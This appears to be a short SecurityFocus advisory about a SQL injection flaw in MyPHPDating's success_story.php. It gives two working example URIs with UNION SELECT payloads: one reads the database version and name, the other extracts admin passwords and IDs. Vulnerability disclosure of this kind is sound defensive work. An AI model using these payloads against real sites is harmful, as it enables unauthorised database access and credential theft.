MyPHPDating 'success_story.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--

http://www.example.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--


 

Privacy Statement
Copyright 2010, SecurityFocus